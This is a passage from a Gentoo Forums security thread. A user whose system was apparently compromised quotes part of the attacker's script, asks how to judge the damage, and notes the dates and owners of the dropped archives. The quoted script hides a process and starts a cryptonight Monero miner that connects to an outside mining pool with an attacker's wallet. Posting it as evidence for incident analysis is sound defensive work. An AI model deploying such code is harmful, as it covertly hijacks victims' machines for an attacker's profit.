if [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./mdx -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 45GCe3MjJq9SgJLQrgsvs2fgpX9Tu6B1mZrUnusaPLcSGveHeBHZZhqY9JciEKqYVyACZamLejJDaeydLksTG1iSFgMB68b -p x >>/dev/null &
fi
echo $! > bash.pid

THE STRANGENESS OF THIS WHOLE THING IS THE DATES THAT THE PAYLOAD SHOW UP, ONE FILE OWNED BY GUEST IN OCTOBER AND THEN ALMOST A MONTH LATER THE ROOT OWNED FILE SHOWS UP, BOTH ARE ZIPPED ARCHIVES, AND I AM JUST HOPING THAT THE ROOTKIT NEVER GOT TO RUN (THANKFUL IF THAT IS THE CASE).

NEDDY, what other signs can I be looking for in terms of locating the effect of any damage? From the rootkit or otherwise!
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Goto page 1, 2  Next
Page 1 of 2

Jump to: